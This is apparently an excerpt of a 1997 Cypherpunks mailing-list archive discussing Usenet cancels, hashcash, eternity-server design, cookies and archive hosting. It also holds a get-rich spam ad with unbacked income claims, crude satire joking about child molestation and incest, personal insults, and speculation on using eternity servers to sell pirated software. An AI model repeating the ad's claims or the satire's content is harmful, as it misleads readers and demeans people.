> > I wonder if there is a problem of inconsistent levels in this debate... > > At one level, many people on this list are in favour of infrastructure > such as Usenet and the Web carrying all information without filtering with > respect to content, to avoid censorship, oppression and so on. > > At another level, almost everybody has personal preferences as to what > they consider worthwhile information, what they want to read, what they > want their children/employees to read, and what they want their > privately-owned hardware to be used to carry. > > At the content-free level, cancels are information just like anything > else, merely a stream of octets. By definition, they _can't_ be morally > wrong at that amoral level where we talk only about whether > store-and-forward works properly or not. Cancels, "forged" or otherwise > are just a tool, just bytes. > > Within a particular value system, you might agree or disagree with a > particular cancel, or with the idea in general. It's easy to configure a > news server or reader to conform to your preferences, just people who hate > spam are free to ignore it. At this level, you can make judgements as to > which uses of that tool are justifiable. (Cancels by sysadmins, > anti-spammers, spammers, system owners, governments, parents, copyright > lawyers or nobody at all.) Very good point. The problem exists at both levels, however. At the "content-free" level the equivalent of spam is a flooding denial of service attack. But thinking about it at the "content free" level puts the issues in a much better focus, for me. You can note the following: 1) at a "content-free" level filters, by definition simply don't work. [They don't really work for spam, either, of course.] 2) the issue is fundamentally bandwidth consumption [with spam the bandwidth is human attention bandwidth] 3) it's a damn hard problem, and no good solution exists 4) there is an analog to e-postage in QOS routing, but the problem of flooding is still not solved. -- Kent Crispin "No reason to get excited", kent at songbird.com the thief he kindly spoke... PGP fingerprint: B1 8B 72 ED 55 21 5E 44 61 F4 58 0F 72 10 65 55 http://songbird.com/kent/pgp_key.html From nospam-seesignature at ceddec.com Fri Aug 8 10:21:02 1997 From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com) Date: Sat, 9 Aug 1997 01:21:02 +0800 Subject: anti-spam law implies laws against remailers? (was Re: bulk postage fine) In-Reply-To: <199708080956.KAA01839@server.test.net> Message-ID: <97Aug8.131019edt.32257@brickwall.ceddec.com> On Fri, 8 Aug 1997, Adam Back wrote: > > Remailers are just middlemen in a delivery process. > > I hope you're right. > > I still think laws against spam are the wrong approach, even if the > courts declare remailers as delivery mechanisms only. > > "Write code, not Laws." > > (Btw who's quote is that? I like it and wanted to quote it in an > article on Eternity.) > > Re spam problems and writing code and not laws, hashcash was my best > attempt: > > http://www.dcs.ex.ac.uk/~aba/hashcash/ > > However coding is not the only problem, the other is getting people to > use stuff. Advertising, subscribing to appropriate newsgroups, going > to IETF meetings, deployment wins, but stuff dies due to little > investment in advocacy. I haven't got the energy or resources to I think you never answered the fundamental question: But to what advantage is it for *ME* to use hashcash? Saying that it is neat, patriotic, pious, or any other adjective won't get my anonymous mail through any faster unless you can create a cartel of remailers that expidite hashcashed mail, or use some type of new remailer that others don't have and build hashcash into the distribution. You still have the problem that a large organization can buy large computers just to do hashcash - look for networkable hashcash generators if it becomes popular. If it doesn't solve an immediate problem, it is similar to advocating solar energy when it is more expensive and/or cumbersome than fossil fuels. If/when enough remailers are clogged, hashcash is likely to be adopted, but it is difficult to sell something when others offer the same thing for free. > I wrote the eternity service implementation 3 months ago, released > source code: no interest. (Bar a few email messages saying "cool"). > No demonstration system was the problem. > > Mike Duvos provided a demonstration system last week when I reposted > the announce due to his discussing similar ideas, and poof: 4 eternity > servers, wired article, another request to write an article for some > magazine, offers to give talks at US universities. Wew. Having interesting content draws interest, and proposing a method is far from doing a prototype (questions like "are newsgroups stored long enough?" and "will the cgi script work properly?" are only answered by a working implementation, and a few of the eternity servers I tried returned nothing from the links, but are probably fixed). The legal problems still need to be resolved. As long as no copyrighted material appears I think things will be fine, but when MSwhatever appears, someone is going to say the eternity server is like an illegal cable descrambler or make up something very similar to ban them since they aren't merely forwarding the content from alt.anonymous.messages - if encryption is an envelope, the eternity server opens it. Otherwise, you could simply post the plaintext to an alt group. If that doesn't happen now (why?), then adding an encryptor and decryptor isn't going to change it, otherwise simply post the encrypted text, and the passphrase in the same message, or the encrypted text, the secret key, etc. Except that the URL interface makes access more convienient. --- reply to tzeruch - at - ceddec - dot - com --- From randerso at ece.eng.wayne.edu Fri Aug 8 10:21:10 1997 From: randerso at ece.eng.wayne.edu (Ryan Anderson) Date: Sat, 9 Aug 1997 01:21:10 +0800 Subject: Death of the North American Crypto archive? In-Reply-To: Message-ID: On Fri, 8 Aug 1997, Dr.Dimitri Vulis KOTM wrote: > > It is economics. Can anyone suggest an alternate host that might provide room > > for a few hundred megabytes of ftp access for free (or nearly free)? Can > > someone else in North American mirror all of that data, quickly, before the > > site shuts down? > > If it's under 650MB, I can fit it all on 1 CD... If I knew where the site was, I could probably temporarily store it somewhere until a site was foudn.. ----------------------------------------------------------------------- Ryan Anderson - "Who knows, even the horse might sing" Wayne State University - CULMA "May you live in interesting times.." randerso at ece.eng.wayne.edu Ohio = VYI of the USA PGP Fingerprint - 7E 8E C6 54 96 AC D9 57 E4 F8 AE 9C 10 7E 78 C9 ----------------------------------------------------------------------- From dlv at bwalk.dm.com Fri Aug 8 10:33:02 1997 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 9 Aug 1997 01:33:02 +0800 Subject: Query on cookies In-Reply-To: <33EB4EB4.7ADC@acm.org> Message-ID: "Paul H. Merrill" writes: > Dr.Dimitri Vulis KOTM wrote: > > > > Declan McCullagh writes: > > > > > I believe this is what the folks at Netscape tried to eliminate in 4.0, > > > which I'm told features four cookie settings. One rejects "third party > > > cookies." > > > > Blessed are those who believe. > > > And for those who don't believe there is always Read Only for > Cookies.txt. This won't save cookies to disk, but won't they be around for the duration of one session? --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From aba at dcs.ex.ac.uk Fri Aug 8 10:54:46 1997 From: aba at dcs.ex.ac.uk (Adam Back) Date: Sat, 9 Aug 1997 01:54:46 +0800 Subject: a decentralised dejanews Message-ID: <199708081640.RAA00985@server.test.net> As you'll know if you read some of the previous eternity verbiage I've generated over the last few days, the design is evolving as ideas are bounced around. To recap briefly: The eternity implementation at the moment is performing the function of a cache of USENET, which also `reformats' messages to extract and deliver the content as web documents. The cache has no replacement policy. Planned replacement policies where least accessed documents, and/or the document accompanied by the smallest ecash payment. Obvious problem: The cache will fill up and material will be discarded when the eternity document store grows too large for one machine to cache. Solution: My last thoughts on how to fix this was to have collaboration between the eternity servers: they ask each for documents they don't have. They act like a distributed raid file server with redundancy. Clearly with the "least accessed" replacement policy they'll all likely cache similar material, and documents will still fall off the cache. Ecash payment for cacheing might work reasonably well, if you buy as much redundancy as you wish by including cash for several servers. Or perhaps a random cache replacment policy is the simplest to keep even spread of availability of documents. k of n secret sharing could be used at some overhead so that no one site is responsible for serving a given document. However it is fairly complex to design and implement such a system which can provide full underdisturbed service with nodes dynamically leaving and joining, and it is also difficult to protect fully against denial of service attacks. Recap on old idea of using dejanews and altavista You will recall that earlier discussions talked about using dejanews or altavista as archives to fetch documents from. I rejected this initial idea because altavista and dejanews take steps to reduce their disk space usage, by stripping out UU and radix-64 encoded documents. Now we can fool them easily enough by waging a running battle of increasingly sophisticated textual stego on our side vs playing catch up with cleverer eternity document spotters on their part. We might even win long term if we public key encrypted the documents for specific eternity servers. Kind of messy. Old content will be disappearing if they go back and filter out old with the new filters. However is another important reason not to use altavista or dejanews: it's not decentralised. If something sufficiently hot gets published they'll both be taken off line long enough to figure out how to disable access to eternity. Even if they can't do it ultimately because of sufficiently advanced public key text steganography, it'll disrupt the service. Viewing the situation more modularly: The eternity service with a distributed raid file server formed from the respective caches has one problem: of acceptability. Each server is actually holding eternity material, it tries to get away with this by claiming that it is a cache. However each server is serving three potentially separable functions: - document cache - node in a distributed news archival service, but only for messages which look like eternity articles - a view on the database to allow it to be viewed interactively as web documents (fetching and translating decoding eternity documents to serve as web pages) The first function -- a document cache could probably just as well be served by a standard proxy cache. Not a big issue, it's easy either way. The second function makes it hard to claim you are `just cacheing USENET' -- you're also creating a distributed archive of a very particular subset of it. And the third function, viewing the database, is somewhat like a specialised search engine. The search engine functionality is 100% replicatable at practically zero storage overhead, and pretty good as a non-censorable element of the system. 100% redundancy of service each node has nothing that can't be replaced. A distributed deja-news replacement So after separating the functionality it becomes apparent that we could have a another model. Actually try to start a distributed deja-news replacement, an complete eternal record of _everything_ that _ever_ gets posted to news. Dejanews is kind of doing that, except that it's not complete -- they are stripping out uuencoded files, etc. Also this would be distributed, and harder to coerce. So what are the storage requirements? What does dejanews have in their machine room? (Huge raid server? How many Gigs?). I'm wondering if 1000 academic nodes, small and large ISP nodes, and indivduals each contributing 1Gb each could out perform deja-news. That'd be 1Tb. How long would 1Tb last at the being consumed at a rate of a full USENET feed? As disks get cheaper, next two years or so, people can upgrade disks to 10Gb disks or whatever is cheap at the time. You would want some redundancy, more than redundancy than dejanews needs in their raid fileserver, because nodes may come and go, and the number of nodes could fluctuate. On top of distributed news archive, build an eternity service So with the eternal news archive, you now have everything you need to easily build an eternity server. How practical is this? How much interest is there likely to be in creating a full USENET archive as a distributed net based effort. It's clearly got vastly larger storage requirments than storing the full set of eternity articles posted to USENET. However it has wider uses, and has lots of innocuous reasons to exist. I guess it's quite an interesting project in it's own right. You could start with just some newsgroups, and build up as a way to boot strap it. But it may be harder to generate enough interest to deploy this than to deploy enough eternity servers to do build a distributed archive of just eternity articles. How soon could it happen? Who knows. What do people reckon the interest would be in a distributed complete USENET archive for it's own sake. For purposes of the archive cancels would not be applied. Indeed archive the cancels too, and the control messages for everyone to see for perpetuity who did and said what. Best way forward? Perhaps it will be more realistic to build a distributed archive for eternity documents only first. If it is designed as a separate service, then it could be the same software to do either, just restrict it to alt.anonymous.messages, or just for alt.anonymous.messages passing a filter program. Comments? Adam -- Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 Message-ID: <33EB8DA7.71C8@acm.org> Dr.Dimitri Vulis KOTM wrote: > > "Paul H. Merrill" writes: > > > Dr.Dimitri Vulis KOTM wrote: > > > > > > Declan McCullagh writes: > > > > > > > I believe this is what the folks at Netscape tried to eliminate in 4.0, > > > > which I'm told features four cookie settings. One rejects "third party > > > > cookies." > > > > > > Blessed are those who believe. > > > > > And for those who don't believe there is always Read Only for > > Cookies.txt. > > This won't save cookies to disk, but won't they be around for the duration > of one session? > True, true, but the belief level needed is low and the hysterical data aspects are gone even if you are still tracking mud around from the "current" walkabout. PHM From admin at CyberSpaceTechnologies.com Fri Aug 8 12:14:41 1997 From: admin at CyberSpaceTechnologies.com (David D.W. Downey) Date: Sat, 9 Aug 1997 03:14:41 +0800 Subject: The BIG Lie (Jesus Confesses) In-Reply-To: <199708081253.GAA06495@wombat.sk.sympatico.ca> Message-ID: <33EB9D22.166F80B5@cyberspacetechnologies.com> You know, you are just about the biggest idiot I have ever had the displeasure of reading. For one, the largest religion in the US right now *is* in fact judeo-christian. The largest is Roman Catholic with Pentacostal Protestant following right behind. Next, this country was founded on christian beliefs, or have you failed to read the words of the constitution of the US. Considering the apparent ignorance you have displayed thus far about the makeup of the US, I would venture to say that you probably have not read it. Next, you attack christians for trying to control the content made available on the internet. At least the site ratings plan is better than alot of other plans I have seen. Besides, Oh Godlike TruthMonger, where is *your* surefire plan to halt the spread of trash that *most* humans would want out of of the reach of their children? I have not seen you *once* offer a straightforward clear cut plan to efficiently handle *any* issue placed for discussion on this listserv. I have seen you do nothing but slam, belittle, and degrade others and their beliefs and ideas. You do this under the unimpressive tag of "TruthMonger". If anything, you are anything but a TruthMonger. When you can come up with a plan that even *remotely* seems like a logically thought out, planned, and intelligent proposal on how to handle the issues presented everyday on the internet that affect the computing industry balanced with a concern for the children, then I will listen. (And yes, I do agree that the parents of the children have an obligation to monitor the content they are exposed to. It's called responsible parenting which unfortunately is not a well practiced ideology. And to take the wind out of your sales, I have 2 children and as a parent I limit them to what is appropriate to their ages.) Until such time as you can fulfill the obligations to us, the adult computing population, and our offspring, the children (just in case your fuddled mind does not know what they are), I suggest you rest those busy little fingers of yours and listen to the underlying theme of the issues before us. Until then, HateMonger, I have one suggestion for you..... Shut Up! From SmartBiz at NevWest.com Sat Aug 9 03:28:31 1997 From: SmartBiz at NevWest.com (SmartBiz at NevWest.com) Date: Sat, 9 Aug 1997 03:28:31 -0700 (PDT) Subject: EARN $2,000-5,000/Week Part Time Message-ID: <199708091020.GAA19886@mail.clark.net> /////////////////////////////////////////////////////////////////////////////// This Message was Composed using Extractor Pro Bulk E- Mail Software. If you wish to be removed from this advertiser's future mailings, please reply with the subject "Remove" and this software will automatically block you from their future mailings. //////////////////////////////////////////////////////////////////////////////// READ THIS LETTER AND ... ..LEARN ABOUT ONE OF THE MOST EXCITING BUSINESSES I'VE EVER SEEN! . Learn How to Earn $2,000 - $5,000 / Week - $10,000 - $20,000 / Month � This business is NOT MLM (Many Loosing Money). � This business is NOT a FRANCHISE. � This business does NOT require having Inventory. � We have a Turn Key Business that Anyone Can Do. � We have Many Lead Generating Sources. � We have 14 hours of FREE Training every week by Phone. � We have Excellent FREE Support by Phone. If your like the rest of us, you would like to find a way to make a lot of money from home and work on your own time. Well that�s exactly what we do. That�s right, we don�t go to meetings, we don't waste time driving anywhere and we don�t share our profits with anyone. We make 90% on every Sale! Our customers pay us direct, by private courier, FedEx, UPS, etc. everyday! No Middlemen! No Commission Spits! Just Profit! We have an easy, 3 step, process to learn about this business and we do it by phone. To learn more about this very lucrative business, CALL ME! ..CALL TOLL FREE 800-995-0796 x 6842 and listen to a 2 minute message further explaining this very exciting business. Leave your name and phone number and I will call you back. ..USE REPLY ONLY TO ADD YOUR NAME TO OUR PERMINENT REMOVE LIST !!! From nobody at REPLAY.COM Fri Aug 8 13:04:41 1997 From: nobody at REPLAY.COM (Anonymous) Date: Sat, 9 Aug 1997 04:04:41 +0800 Subject: Comuter Hillbillies Message-ID: <199708081937.VAA27238@basement.replay.com> >From don at basisinc.com Wed Aug 6 16:06 PDT 1997 MIME-Version: 1.0 To: gomez at basisinc.com, danu at basisinc.com, pat at basisinc.com, jheim at prologic.com Subject: [Fwd: [Fwd: Computer Hillbillies... X-Priority: 3 (Normal) Content-Transfer-Encoding: 7bit (CoE) The Computer Hillbillies Come and listen to a story 'bout a man named Jed, A poor college kid, barely kept his family fed, But then one day he was talking to a recruiter, Who said, "they pay big bucks if ya work on a computer..." Windows, that is... PC's... Workstations... Well, the first thing ya know ol' Jed's an Engineer. The kinfolk said "Jed, move away from here". They said "California is the place ya oughta be", So he bought some donuts and he moved to Silicon Valley... Intel, that is... Pentium ... big amusement park... On his first day at work, they stuck him in a cube. Fed him more donuts and sat him at a tube. They said "your project's late, but we know just what to do. Instead of 40 hours, we'll work you 52!" OT, that is... unpaid... mandatory... The weeks rolled by and things were looking bad. Schedules started slipping and some managers were mad. They called another meeting and decided on a fix. The answer was simple... "We'll work him sixty-six!" Tired, that is... stressed out... no social life... Months turned to years and his hair was turning grey. Jed worked very hard while his life slipped away. Waiting to retire when he turned 64, Instead he got a call and escorted out the door. Laid off, that is... de-briefed... unemployed... Now the moral of the story is listen to what you're told, Companies will use you and discard you when you're old. So gather up your friends and start your own firm, Beat the competition, watch the bosses squirm. Millionaires, that is... Bill Gates... Steve Jobs... Y'all come back now... ya hear' From enoch at zipcon.net Fri Aug 8 14:19:15 1997 From: enoch at zipcon.net (Mike Duvos) Date: Sat, 9 Aug 1997 05:19:15 +0800 Subject: The BIG Lie (Jesus Confesses) In-Reply-To: <33EB9D22.166F80B5@cyberspacetechnologies.com> Message-ID: <19970808210806.3667.qmail@zipcon.net> > You know, you are just about the biggest idiot I have ever had the > displeasure of reading. For one, the largest religion in the US right > now *is* in fact judeo-christian. You know, I've never viewed the Christians as the problem. The real problem is a shortage of lions. Clearly we need to start a Cypherpunks Emergency Lion Breeding program immediately. -LunchMonger -- Mike Duvos $ PGP 2.6 Public Key available $ enoch at zipcon.com $ via Finger $ {Free Cypherpunk Political Prisoner Jim Bell} From toto at sk.sympatico.ca Fri Aug 8 14:47:54 1997 From: toto at sk.sympatico.ca (Toto) Date: Sat, 9 Aug 1997 05:47:54 +0800 Subject: News Flash! "Lighting Bolt Strikes CypherPunks Mailing List Post!" / Re: The BIG Lie (Jesus Confesses) In-Reply-To: <199708081253.GAA06495@wombat.sk.sympatico.ca> Message-ID: <33EB869B.498B@sk.sympatico.ca> :: Anon-To: cypherpunks at toad.com David D.W. Downey wrote: > You know, you are just about the biggest idiot I have ever had the > displeasure of reading. To tell the truth, I'm really embarassed. It's not bad enough that the TruthMailer was hit by lightning and deleted my references to Tim C. May's Vernacular Translation of the Bible (in a shoddy attempt to throw the emnity caused by my post in his direction), but I have sunk to such a low level of reputation capital that I am being looked down on by someone whose cocaine habit caused him to do such evil things that he changed his name from Morton Jr. to David D.W. I won't even try to pretend that I can answer your objections to my post, since I am just a "drunken voice, barfing in the wilderness." However, there is one who will come "after" me (hopefully, not with a gun), who I am merely "preparing the way" for. He also came "before" me (which you can verify by checking the archives). He is the one who turned the CypherPunks away from the electronically graven image of PGP and taught us to be paranoid in spirit. He taught us that, although we are Phil's chosen people, we must wander in the algorithmic desert for 40 bytes before we enter the Private Land. He was accused by the ASCII-art priests. He was crucified on the cross of censorship, and was deleted, but he arose after three weeks of posts by "something called a Toto" to redeem the list members from the sins they committed in calling for censorship and for the death of the list. He forgives those of us on the list who manage to dodge his eternal rapid-fire, even though he makes fun of us by saying, "My father's house has many Mansons...and too many fucking Mongers." After his list res-erection, his disciples' posts have spread his words far and wide, in a new, distributed list known as "The New Testicle." {"In the beginning, was the Turd..." "Beware of politicians fucking people in sheeple's clothing..." "The Revelation of Timothy C. May, which Zimmerman gave unto him, to show unto the newbies things which must shortly come to pass after introduction of the Clipper chip..." } Since lightning never strikes twice in the same place, I will repost the message as "The _Really_ Big Lie," with a self-rating of FUD. If you hated the remailed sequel, you will despise the original. Jesus H. Fucking ChristMonger From toto at sk.sympatico.ca Fri Aug 8 14:59:14 1997 From: toto at sk.sympatico.ca (Toto) Date: Sat, 9 Aug 1997 05:59:14 +0800 Subject: The _Really_ Big Lie! Message-ID: <33EB8A5E.7661@sk.sympatico.ca> :: Anon-To: too_drunk_to_use_a_remailer at shit!.exposed! [From the "I Have Too Much 'Time, Inc.' On My Hands, So This Must Be _Official_ News" Web site.] I couldn't help but notice that the supposed pillars of the religious community, as well as their oh-so-decent-and-righteous followers, tell such widespread, whoppingly big lies about the motivations behind their public actions, as well as about their future intentions, that the true source of corruption in the religious community must undoubtedly come from "higher up" in the chain of commandments. For example, those who are concerned about their children accessing obscene and satanic material on the InterNet might be expected to supervise their children, as well as acquiring the InterNet tools that are available for limiting their children's access to things which the parents find objectionable. You would also expect them to seek out information on sites that met standards that they found acceptable for their children to access. In short, if their interests truly lay in censoring the information their children access, you think they would do exactly that--control and censor their children's activities on, and access to, the InterNet. I couldn't help but notice that, instead, they want to control the activities and access of everyone who uses the InterNet. I find it hard to believe that these people can claim to have the intellect to form valid beliefs about religious and moral issues, yet not be intelligent enough to understand the options available to them. This leads me to suspect that they are, in reality, two-faced liars, particularly since impartial observers can predict the oppressive and censorous results which are usually the exact opposite of what they claim to be their intentions. Patient: "Doctor, it hurts when I do _this_." Doctor: "Then don't _do_ that." If those calling for control and censorship are truly worried about their children, you would expect then to teach their children not to "do that," and to not make available to them things which will allow them to "do that" if they have raised their children to be disobedient and/or irresponsible. Instead, they seem to be taking the moral "high ground," as if under the impression that they are moral "doctors" charged with diagnosing others as having diseased morals, even if the others don't hurt when they "do that." Problem: Little Johnny wants to visit Paul Bradley's "Jesus Loves the Little Children From Behind" web site. Solution: Don't let him do that. Problem: Little Johnny might visit the Duncan Frissel "Pictures of Jesus" site and find pictures of Jesus buggering the little children. Solution: Don't let Little Johnny access sites that you don't know to be acceptable according to your standards. Now, was the foregoing too hard for those reading this to understand? If not, then what could be the reason for those promoting contol and censoring of other people for suggesting the following option... Problem: Little Johnny might access something on the InterNet which does not meet standards that his parent's find acceptable. Solution: Require everyone on the InterNet to only engage in activities which meet the standards of Little Johnny's parents, starting by putting the onus on everyone on the InterNet to "voluntarily" rate their website according to the standards of Little Johnny's parents. Question:"When was the last time a doctor you didn't know made a 'house call' to check on your health, forced his way in when you objected, and gave you a prostrate exam against your wishes?" Answer:"When the government declared that prostrate cancer was a threat to 'national security' and that early detection would 'protect the children' from child molesters and drug dealers." Since spirituality is not inherently related to fascism, it seemed to me that the moral fascism being promoted by members of the Christian community must be the result, not of spiritual values, but rather, the result of the leader of the Christian religion being a moral fascist. It was also obvious that, given the vast amount of lies being told by Christians about their beliefs, motivations, and intentions, that Christianity must be founded on lies and disinformation. Since I do not like to speak ill of someone without taking pains to understand them from the standpoint of their own knowledge and beliefs, I decided that I should have a talk with Jesus Christ, the founder and espoused leader of the Christian religion, and give him a chance to respond to my view of himself and those who follow his example. Mr. Christ was kind enough to let me take notes during our long conversation, so I am providing a transcript of the highlites of the issues we discussed: ----------------------- TruthMonger: "Mr. Christ..." Jesus Christ: "Please, call me Jesus." TruthMonger: "OK. Jesus, what the fuck is going on with all these people claiming that they have the right to force everyone on the face of the earth to live only within the boundaries of moral judgements approved of by you?" Jesus Christ: "Well, TruthMonger, you have to understand that I am the _only_ Way, the _only_ Truth, and the _only_ Light. Accordingly, it is reasonable for my followers come to the conclusion that whatever I approve of is good and that everything else is bad." TruthMonger: "As in, 'Everything Not Permitted, Is Forbidden!'?" Jesus Christ: "Exactly. By the way, is that from '1984' or from 'Animal Farm'?" TruthMonger: "Don't try to change the subject. Jesus! Oh, I mean that as a swear word, by the way...but this is exactly what I object to in your followers--the fuckers never give a straight, truthful answer to the 'hard' questions. They always fall back on some inane quote of yours that has little to do with the issue being discussed." Jesus Christ: "Well, you can't hold me accountable for their actions..." TruthMonger: "Like _fuck_ I _can't_, shit for brains. You're in America, buddy, and we have conspiracy laws here. If the members of your cult go down, then you go down with them, and vice-versa. "You ever hear of Waco? David Koresh? Maharishi? John F. Kennedy?" Jesus Christ: "You're trying to twist things around here, by comparing me and my followers to small cults and Democrats. After all, America is largely a Christian nation with Republican family values." TruthMonger: "Bullshit! It's a democracy, with a legal seperation of Church and State. "America is a Christian nation" is just one more example of the lies your followers try to propogate every chance they get. It's clearly not true, but they refuse to face reality." Jesus Christ: "I said, 'largely'." TruthMonger: "Exactly. You use a word that infers that a 'majority' of Americans are Christian, in order to suggest that Christianity and Democracy are kissing cousins. This is the same goddamn thing that your followers do by constantly taking a smug, self-righteous stance that concepts like freedom, democracy, right and wrong, are all dependent on or connected to the Christian 'majority's' beliefs and morals. "You could just as well say, 'America is largely a "white" nation' but that pig doesn't fly anymore." Jesus Christ: "Now _you're_ trying to twist _my_ words." TruthMonger: "Christ! Oh, that's meant to be a swear word, too...BTW. "What I mean is that your words are being twisted a lot more by your Christian bum-buddies than I could ever hope to manage. "Which wouldn't concern me in the least if they weren't trying to force a potpourri of alleged 'superior' moral beliefs on the rest of us. This is the crux of the matter. As far as I am concerned. Christian fascism is the enemy of democracy and freedom." Jesus Christ: "Well, that's one way of looking at it. However, you might also say, 'It's not perfect, but it's the best system we've got.'" TruthMonger: "Please don't insult my intelligence. You could say the same thing about a bowl of 'shit' soup, if that's all that you put on the dinner menu. Christians and politicians have always tried to claim that their failure to permit true freedom should be seen as a sign that it cannot be achieved by others, either. "The logic is based on the assumption that politicians and Christians are superior to everyone else, and that they know and do what is 'right'. Then they turn around and claim that, since they are doing what is 'right', that their judgements are superior to everyone else's. "That's called Circular Logic, and that dog's getting old, too." Jesus Christ: "When the Dogs of Holy War get old, they get craftier, as well." "In case you haven't noticed, the censoring of non-Christian beliefs is proceeding pretty much as it always has. When was the last time you heard of someone getting imprisoned for exposing children to Biblical tales of violence and sex, on or off of the InterNet?" TruthMonger: "You've certainly got a point there. Tim May's vernacular translation of the Bible describes Lot fucking his daughters and the guy who pulls out and jerks off on the ground, or whatever, in great detail." "This serves to illustrate the hypocritical lies and bullshit that Christians promote. If Tim wrote a similar story about himself just screwing the living shit out of his children, then the fascist Christians would call for his imprisonment as a child molester, even if Tim announced it was fiction. But a Christian who puts the a story about Lot doing the same thing, only claiming that it is true, won't go to jail even if I stand up in court and testify that, after I read it, I went out and fucked my daughters." Jesus Christ: "And your point is...?" TruthMonger: "My point is that fucking is fucking, butt-fucking is butt-fucking, and there are enough people capable of free thought left in society, and who are wise to your Christian bullshit, that, if I were you, I wouldn't hurry back to take over until you're sure that your fascist lackeys have all the freedom lovers in chains." Jesus Christ: "Is that supposed to be some kind of threat?" TruthMonger: "Hey, pal. All I'm saying is that what is good for the gander is good for the goose. "As long as this country remains a democracy, then you'd better think twice about claiming to 'love all the little children' and you'd damn sure better make certain you have all the right permits before you go around turning water into wine." Jesus Christ: "I resent the implication that I love the children in anything but a purely 'spiritual' way." TruthMonger: "Well, pal, the circumstantial evidence is against you on this one. Wasn't your father involved in some kind of scandal where he made a man and woman naked and then told them to fuck and party down?" "If I remember right, he had some kind of fetish about telling the Jews to fuck a lot and was always talking about their 'cum'." Jesus Christ: "He used _decent_ words, like 'be fruitful and multiply', and 'seed', not 'cum'." "And you should have capitalized the word 'Father' when you made mention of him, BTW" TruthMonger: "Fuck you pal, I'm sending this to the CypherPunks mailing list. Are you the new list moderator? "Good fucking luck..." Jesus Christ: "I don't have to take this kind of abuse. I'm putting you on the 'flames' list." TruthMonger: "Big deal. I'm already in Tim C. May's 'killfile'." Jesus Christ: "If intolerance is such a Christian trait as you claim, then why is my 'flames' list smaller than Tim May's 'killfile'?" TruthMonger: "Now you're twisting _my_ words. Are you related to Kent Crispin? Say... Come to think of it, why has no one ever seen the two of you together?" Jesus Christ: "Let's just say that Kent and I agree on many issues that have to do with the sanctity of a higher authority. "No one has ever seen the evil Dr. Vulis and Satan together, either, but that's no proof of anything." TruthMonger: "Bad example, dude. Bad example. You're practically proving my point for me." "But now that you've brought it up, I would like to point out that both you and Satan are free to post anything you want on the CypherPunks list, but if Tim May posted his vernacular translation of the Bible on Christian mailing lists, he would be hung by his hairy balls from the nearest church tower." Jesus Christ: "How do you know Tim May has hairy balls?" TruthMonger: "You've never been to a CypherPunks physical meeting, have you? Trust me, when the CypherPunks focus their energy on turning wine into water, _nobody's_ math skills are good enough to calculate what might take place." Jesus Christ: "And your point is...?" TruthMonger: "My point is that I'm drunk, it's late, and we both have a lot of work to do before the year 2000. "If you're planning to censor non-Christian values on the InterNet for 'all of eternity', then you'd better get to work on a way to stop the CypherPunks 'Eternity Server' from routing around fascist Christian moralism." Jesus Christ: "Adam Back... Isn't he a member of that weirdo "Circle of Eunuchs" cult?" TruthMonger: "That's for me to know, and for you to find out, pal. "Unless you can break PGP, of course." Jesus Christ: "Hey, I'm just Jesus. I'm not Phil Zimmerman, for _My_ sake." TruthMonger: "Hey, watch your language." Jesus Christ: "Sorry, I meant to say 'for _Dimitri's_ sake'." TruthMonger: "I'll tell him you capitalized his name. He'll get a kick out of that. "Any last words before I turn in for the night?" Jesus Christ: "Christianity recognizes privacy and freedom as damage, and steamrollers over them." TruthMonger: "No shit!" ----------------------- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ All references to Tim C. May's Vernacular Translation of the Bible are used without permission. What's he going to do, sue me? Then he'd have to admits he gets vicarious pleasure out of reading the posts in his killfile. {There's more than _one_ way to push a key.} ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From aba at dcs.ex.ac.uk Fri Aug 8 15:06:14 1997 From: aba at dcs.ex.ac.uk (Adam Back) Date: Sat, 9 Aug 1997 06:06:14 +0800 Subject: recursive auction markets in software Message-ID: <199708082151.WAA01986@server.test.net> [re connection problems to www.replay.com -- Alex is running with the Stronghold 1.4 webserver -- what you're seeing is a bug in it. Presently Alex is going to go back to 1.3, unless C2 comes up with a bug fix version. I really should put up a note to this effect. I'll do that. It's still usuable as it's an intermittent bug, and all you've go to do keep clicking on the reload button in your browser, and it'll get through after a few tries... http//:www.replay.com/aba/eternity/ ] tzeruch wrote about legal problems which could happen if eternity is used to sell, or distribute copyright software: > The legal problems still need to be resolved. As long as no copyrighted > material appears I think things will be fine, but when MSwhatever appears, > someone is going to say the eternity server is like an illegal cable > descrambler or make up something very similar to ban them since they > aren't merely forwarding the content from alt.anonymous.messages - if > encryption is an envelope, the eternity server opens it. The argument that it is a USENET message being forwarded after reformatting may not help that much, -- we'll see how it works out. If there were lots of eternity servers it would be better. > Otherwise, you could simply post the plaintext to an alt group. If > that doesn't happen now (why?), I dunno. It could be for a number of reasons, you'd have to do a survey of the warez d00dz that hang out on IRC channel #warez to see why they don't do it. I guess it's because they find easier to trade with DCC commands in #warez. I had a look at a #warez session in progress some time ago, and the trades were going down every few minutes. Take a look. Especially games trades but also high price DTP and photo retouching stuff. You'd see `trade quark-Xpress 8 for registered quake' or whatever come up a few times, and then it'd stop, and that handle'd say thanks I've got it now. IRC is less main stream, and these folks don't like the lime light because they know that their 'warez trading habits are frowned upon by many. Another reason is that why should they bother, what's their motivation? They aren't making money from it I don't think, they're just after copyright software without paying for it. It's probably just that the most efficient market for leveraging what they have got copies of via trades is on IRC right now. Another class of pirate is the Chinese (it is Chinese who do this yes?) who make CDs full of commercial software and sell it way under market price. Perhaps that class of pirate would take off if the net bandwidth was up to it. Their next problem would be to control access to their anonymous eternity page to allow themselves to get some money from it. Perhaps eternity servers could be set up to charge for downloads and pass back money to the anonymous poster. But then how do you stop someone else reposting it and charging a lower price? Well you can't. But that's all what recursive auction markets are about. The reaches a point of diminishing returns, and the user can buy freshly released products more quickly from the first non-copyright abiding software reseller, or they can buy it more cheaply if they wait as the price falls over a few days. Eric Hughes apparently gave a talk at a hacker con some time back about UIPS 